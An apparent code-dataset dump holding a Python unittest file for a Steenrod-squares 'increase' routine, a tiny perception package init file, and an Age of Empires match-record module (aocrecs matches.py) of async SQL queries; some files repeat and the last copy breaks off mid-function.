pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #7
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #8
self.assertEqual(parallel,[[],[2],[2,0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #9
self.assertEqual(parallel,[[],[2],[2,1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #10
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #11
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #12
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #13
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #14
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[1, 2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #15
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[0,2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #16
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #17
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #18
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[1],[2,1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #19
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[0,1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #20
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #21
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #22
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[2,0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #23
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[1,0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #24
self.assertEqual(stop, True)
if __name__ == '__main__':
unittest.main() | import sys, os
ksb_homology_path_list=os.path.dirname(os.path.realpath(__file__)).split("\\")[0:-2]
ksb_homology_path= "\\".join(ksb_homology_path_list)
if ksb_homology_path not in sys.path:
sys.path.append(ksb_homology_path)
import unittest
from ksb_homology.Ssquares import Ssquares
class SsquaresTest(unittest.TestCase):
def setUpIncreaseValues(top,bot):
uddot=sorted(set(top).difference(set(bot)))
n=len(uddot)
parallel=[[]]
remain=[[]]
circ=[uddot]
for l in range(1,n):
parallel.append(circ[0][0:l])
circ.append(circ[0][l:n])
remain.append([])
return [parallel,circ,remain]
def test_calculate_index(self):
return 1
'''def test_kth_steenrod_square(self):
X=BS.proyective_2planes_product_element()
S=((),(1))
sol=kth_steenrod_square( 2, X, S)
self.assertEqual(kth_steenrod_square( 2, X, S), ((0,1),(1)) )'''
def test_increase1(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[],[0],[0,1],[0,1,3]])
self.assertEqual(circ,[[0,1,2,3],[1,2,3],[2,3],[2]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase2(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [2]])
self.assertEqual(remain,[[],[],[],[3]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase3(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [3]])
self.assertEqual(remain,[[],[],[],[2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase4(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [3]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1) #algorithm sais 1
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
def test_increase5(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,3]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [1]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_complete_increase(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #1
self.assertEqual(parallel,[[],[0],[0,2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #2
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #3
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #4
self.assertEqual(parallel,[[],[1],[1,0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #5
self.assertEqual(parallel,[[],[1],[1,2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #6
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #7
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #8
self.assertEqual(parallel,[[],[2],[2,0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #9
self.assertEqual(parallel,[[],[2],[2,1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #10
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #11
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #12
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #13
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #14
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[1, 2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #15
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[0,2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #16
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #17
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #18
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[1],[2,1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #19
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[0,1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #20
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #21
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #22
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[2,0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #23
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[1,0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #24
self.assertEqual(stop, True)
if __name__ == '__main__':
unittest.main() | en | 0.253714 | def test_kth_steenrod_square(self): X=BS.proyective_2planes_product_element() S=((),(1)) sol=kth_steenrod_square( 2, X, S) self.assertEqual(kth_steenrod_square( 2, X, S), ((0,1),(1)) ) #algorithm sais 1 #1 #2 #3 #4 #5 #6 #7 #8 #9 #10 #11 #12 #13 #14 #15 #16 #17 #18 #19 #20 #21 #22 #23 #24 | 2.341113 | 2 |
cse481wi18/perception/src/perception/__init__.py | TimAdamson21/access_teleop | 0 | 6612441 | <filename>cse481wi18/perception/src/perception/__init__.py
from .mock_camera import MockCamera
| <filename>cse481wi18/perception/src/perception/__init__.py
from .mock_camera import MockCamera
| none | 1 | 1.106079 | 1 | |
python/aocrecs/logic/matches.py | Rotzbua/aocrecs.com | 7 | 6612442 | """Matches."""
import asyncio
from aocrecs.cache import cached, dataloader_cached
from aocrecs.util import by_key, compound_where
@cached(ttl=None)
async def get_chat(database, match_id):
"""Get match chat."""
query = """
select name, player_number, message, origination, audience, timestamp, color_id
from chat join players on chat.player_number=players.number and chat.match_id=players.match_id
where chat.match_id=:match_id
order by id
"""
result = await database.fetch_all(query, values={'match_id': match_id})
return [dict(c, player=dict(
name=c['name'],
number=c['player_number'],
match_id=match_id,
color_id=c['color_id']
)) for c in result]
@dataloader_cached(ttl=None)
async def get_research_by_player(keys, context):
    """Return technology-research records grouped by (match_id, player_number).

    ``keys`` is a list of (match_id, player_number) pairs; each group is
    ordered chronologically by research start time.
    """
    condition, values = compound_where(keys, ('match_id', 'player_number'))
    template = """
    select name, started::interval(0), finished::interval(0), player_number, match_id,
        extract(epoch from started)::integer as started_secs, extract(epoch from finished)::integer as finished_secs
    from research join technologies on research.technology_id=technologies.id and research.dataset_id=technologies.dataset_id
    where {}
    order by started
    """
    rows = await context.database.fetch_all(template.format(condition), values=values)
    return by_key(rows, ('match_id', 'player_number'))
def make_players(player_data, match_id):
    """Build enriched player dicts for one match.

    Each flat player record from ``player_data[match_id]`` gains nested
    ``user`` (itself holding an optional ``person``) and ``civilization``
    structures derived from its columns. ``user`` is None for rows without
    a ``user_id``; ``person`` is None for rows without a ``person_id``.
    """
    players = []
    for record in player_data[match_id]:
        person = None
        if record['person_id']:
            person = dict(
                id=record['person_id'],
                country=record['country'],
                name=record['person_name']
            )
        user = None
        if record['user_id']:
            user = dict(
                id=record['user_id'],
                name=record['name'],
                platform_id=record['platform_id'],
                person=person
            )
        civilization = dict(
            id=record['civilization_id'],
            name=record['civilization_name'],
            dataset_id=record['dataset_id']
        )
        players.append(dict(record, user=user, civilization=civilization))
    return players
def make_teams(player_data, match_id):
    """Group a match's players into team dicts and find the winning team.

    Returns a (teams, winning_team) pair; ``winning_team`` is None when no
    team contains a winning player.
    """
    teams = []
    for team_id, members in by_key(player_data, 'team_id').items():
        teams.append(dict(
            team_id=team_id,
            winner=any(member['winner'] for member in members),
            players=members,
            match_id=match_id
        ))
    winner = None
    for team in teams:
        if team['winner']:
            winner = team
            break
    return teams, winner
def make_files(player_data, file_data, match_id):
    """Attach a download link and the owning player dict to each file record."""
    players_by_number = by_key(player_data, 'number')
    files = []
    for record in file_data[match_id]:
        # Each number groups to a single-player list; take its only element.
        owner = players_by_number[record['owner_number']][0]
        files.append(dict(
            record,
            download_link='/api/download/{}'.format(record['id']),
            owner=owner
        ))
    return files
@dataloader_cached(ttl=None)
async def get_player(keys, context):
    """Return basic player info keyed by (match_id, number).

    ``keys`` is a list of (match_id, number) pairs; each resolved entry is a
    flat player dict with a nested ``user`` structure (whose fields may be
    None for unattributed players).
    """
    condition, values = compound_where(keys, ('match_id', 'number'))
    query = """
    select
        players.match_id, players.number, players.name, players.winner, players.color_id,
        players.user_id, players.platform_id, players.user_name
    from players
    where {}
    """.format(condition)
    rows = await context.database.fetch_all(query, values=values)
    players = {}
    for row in rows:
        players[(row['match_id'], row['number'])] = dict(
            match_id=row['match_id'],
            number=row['number'],
            name=row['name'],
            color_id=row['color_id'],
            winner=row['winner'],
            user=dict(
                id=row['user_id'],
                name=row['user_name'],
                platform_id=row['platform_id']
            )
        )
    return players
@dataloader_cached(ttl=None)
async def get_match(keys, context):
    """Fetch full match records for the given match ids.

    Runs three queries concurrently (matches, players, files), then assembles
    one rich dict per match: players with user/civilization data, teams with
    the winner, file records with download links, and nested event/tournament/
    series/dataset/platform/ladder structures (None where the id column is
    NULL). Returns a dict mapping match id -> match dict.

    Fix over the previous version: the per-match-id groupings of player and
    file rows are computed once, outside the loop — they were previously
    rebuilt by ``by_key`` on every iteration, making assembly O(matches × rows).
    """
    player_query = """
    select players.match_id, players.team_id, players.number, players.name, players.winner, teams.winner as t_winner,
        player_colors.name as color, players.color_id,
        civilizations.id as civilization_id, civilizations.name as civilization_name,
        players.dataset_id, players.platform_id, players.user_id, players.user_name,
        rate_snapshot, rate_before, rate_after, mvp, human, score, military_score,
        economy_score, technology_score, society_score, units_killed, buildings_razed,
        buildings_lost, units_converted, food_collected, wood_collected, stone_collected,
        gold_collected, tribute_sent, tribute_received, trade_gold, relic_gold, units_lost,
        feudal_time, castle_time, imperial_time,
        extract(epoch from feudal_time)::integer as feudal_time_secs, extract(epoch from castle_time)::integer as castle_time_secs,
        extract(epoch from imperial_time)::integer as imperial_time_secs, explored_percent, research_count,
        total_wonders, total_castles, total_relics, villager_high,
        people.id as person_id, people.country, people.name as person_name
    from players join teams on players.team_id=teams.team_id and players.match_id=teams.match_id
        join player_colors on players.color_id=player_colors.id
        join civilizations on players.dataset_id=civilizations.dataset_id and players.civilization_id=civilizations.id
        join datasets on players.dataset_id=datasets.id
        left join platforms on players.platform_id=platforms.id
        left join users on players.platform_id=users.platform_id and players.user_id=users.id
        left join people on users.person_id=people.id
    where players.match_id=any(:match_id)
    """
    file_query = """
    select id, match_id, size, original_filename, language, encoding, owner_number
    from files where match_id=any(:match_id)
    """
    match_query = """
    select matches.id, map_name, rms_seed,
        matches.dataset_id, datasets.name as dataset_name,
        matches.platform_id, platforms.name as platform_name,
        platforms.url as platform_url, platforms.match_url as platform_match_url,
        matches.event_id, events.name as event_name,
        matches.tournament_id, tournaments.name as tournament_name,
        matches.series_id, series_metadata.name as series_name,
        matches.ladder_id, ladders.name as ladder_name,
        difficulties.name as difficulty,
        game_types.name as type, matches.type_id,
        map_reveal_choices.name as map_reveal_choice,
        map_sizes.name as map_size,
        speeds.name as speed,
        starting_ages.name as starting_age,
        starting_resources.name as starting_resources,
        victory_conditions.name as victory_condition,
        played, rated, diplomacy_type, team_size, platform_match_id,
        cheats, population_limit, lock_teams, mirror, dataset_version, postgame, has_playback, duration::interval(0),
        versions.name as version, extract(epoch from duration)::integer as duration_secs, winning_team_id,
        game_version, save_version, build,
        rms_seed, rms_custom, direct_placement, fixed_positions, guard_state, effect_quantity,
        added
    from matches
        join versions on matches.version_id=versions.id
        join datasets on matches.dataset_id=datasets.id
        join difficulties on matches.difficulty_id=difficulties.id
        join game_types on matches.type_id=game_types.id
        join map_reveal_choices on matches.map_reveal_choice_id=map_reveal_choices.id
        join map_sizes on matches.map_size_id=map_sizes.id
        join speeds on matches.speed_id=speeds.id
        left join platforms on matches.platform_id=platforms.id
        left join starting_ages on matches.starting_age_id=starting_ages.id
        left join starting_resources on matches.starting_resources_id=starting_resources.id
        left join victory_conditions on matches.victory_condition_id=victory_conditions.id
        left join ladders on matches.ladder_id=ladders.id and matches.platform_id=ladders.platform_id
        left join events on matches.event_id=events.id
        left join tournaments on matches.tournament_id=tournaments.id
        left join series_metadata on matches.series_id=series_metadata.series_id
    where matches.id=any(:id)
    """
    matches, players, files = await asyncio.gather(
        context.database.fetch_all(match_query, values={'id': keys}),
        context.database.fetch_all(player_query, values={'match_id': keys}),
        context.database.fetch_all(file_query, values={'match_id': keys})
    )
    # Group rows by match id once; previously recomputed for every match.
    players_by_match = by_key(players, 'match_id')
    files_by_match = by_key(files, 'match_id')
    output = {}
    for match in matches:
        match_id = match['id']
        player_data = make_players(players_by_match, match_id)
        team_data, winning_team = make_teams(player_data, match_id)
        output[match_id] = dict(
            match,
            players=player_data,
            teams=team_data,
            winning_team=winning_team,
            minimap_link='/api/map/{}'.format(match_id),
            event=dict(
                id=match['event_id'],
                name=match['event_name']
            ) if match['event_id'] else None,
            tournament=dict(
                id=match['tournament_id'],
                name=match['tournament_name']
            ) if match['tournament_id'] else None,
            series=dict(
                id=match['series_id'],
                name=match['series_name']
            ) if match['series_id'] else None,
            files=make_files(player_data, files_by_match, match_id),
            dataset=dict(
                id=match['dataset_id'],
                name=match['dataset_name']
            ),
            platform=dict(
                id=match['platform_id'],
                name=match['platform_name'],
                url=match['platform_url'],
                match_url=match['platform_match_url']
            ) if match['platform_id'] else None,
            ladder=dict(
                id=match['ladder_id'],
                name=match['ladder_name'],
                platform_id=match['platform_id']
            ) if match['ladder_id'] else None
        )
    return output
| """Matches."""
import asyncio
from aocrecs.cache import cached, dataloader_cached
from aocrecs.util import by_key, compound_where
@cached(ttl=None)
async def get_chat(database, match_id):
    """Return all chat messages for a match, each annotated with its sender.

    Messages come back in insertion order (``order by id``); every entry
    carries a nested ``player`` dict built from the joined player row.
    """
    query = """
    select name, player_number, message, origination, audience, timestamp, color_id
    from chat join players on chat.player_number=players.number and chat.match_id=players.match_id
    where chat.match_id=:match_id
    order by id
    """
    rows = await database.fetch_all(query, values={'match_id': match_id})
    messages = []
    for row in rows:
        sender = dict(
            name=row['name'],
            number=row['player_number'],
            match_id=match_id,
            color_id=row['color_id']
        )
        messages.append(dict(row, player=sender))
    return messages
@dataloader_cached(ttl=None)
async def get_research_by_player(keys, context):
    """Return technology-research records grouped by (match_id, player_number).

    ``keys`` is a list of (match_id, player_number) pairs; each group is
    ordered chronologically by research start time.
    """
    condition, values = compound_where(keys, ('match_id', 'player_number'))
    template = """
    select name, started::interval(0), finished::interval(0), player_number, match_id,
        extract(epoch from started)::integer as started_secs, extract(epoch from finished)::integer as finished_secs
    from research join technologies on research.technology_id=technologies.id and research.dataset_id=technologies.dataset_id
    where {}
    order by started
    """
    rows = await context.database.fetch_all(template.format(condition), values=values)
    return by_key(rows, ('match_id', 'player_number'))
def make_players(player_data, match_id):
    """Build enriched player dicts for one match.

    Each flat player record from ``player_data[match_id]`` gains nested
    ``user`` (itself holding an optional ``person``) and ``civilization``
    structures derived from its columns. ``user`` is None for rows without
    a ``user_id``; ``person`` is None for rows without a ``person_id``.
    """
    players = []
    for record in player_data[match_id]:
        person = None
        if record['person_id']:
            person = dict(
                id=record['person_id'],
                country=record['country'],
                name=record['person_name']
            )
        user = None
        if record['user_id']:
            user = dict(
                id=record['user_id'],
                name=record['name'],
                platform_id=record['platform_id'],
                person=person
            )
        civilization = dict(
            id=record['civilization_id'],
            name=record['civilization_name'],
            dataset_id=record['dataset_id']
        )
        players.append(dict(record, user=user, civilization=civilization))
    return players
def make_teams(player_data, match_id):
    """Group a match's players into team dicts and find the winning team.

    Returns a (teams, winning_team) pair; ``winning_team`` is None when no
    team contains a winning player.
    """
    teams = []
    for team_id, members in by_key(player_data, 'team_id').items():
        teams.append(dict(
            team_id=team_id,
            winner=any(member['winner'] for member in members),
            players=members,
            match_id=match_id
        ))
    winner = None
    for team in teams:
        if team['winner']:
            winner = team
            break
    return teams, winner
def make_files(player_data, file_data, match_id):
    """Attach a download link and the owning player dict to each file record."""
    players_by_number = by_key(player_data, 'number')
    files = []
    for record in file_data[match_id]:
        # Each number groups to a single-player list; take its only element.
        owner = players_by_number[record['owner_number']][0]
        files.append(dict(
            record,
            download_link='/api/download/{}'.format(record['id']),
            owner=owner
        ))
    return files
@dataloader_cached(ttl=None)
async def get_player(keys, context):
    """Return basic player info keyed by (match_id, number).

    ``keys`` is a list of (match_id, number) pairs; each resolved entry is a
    flat player dict with a nested ``user`` structure (whose fields may be
    None for unattributed players).
    """
    condition, values = compound_where(keys, ('match_id', 'number'))
    query = """
    select
        players.match_id, players.number, players.name, players.winner, players.color_id,
        players.user_id, players.platform_id, players.user_name
    from players
    where {}
    """.format(condition)
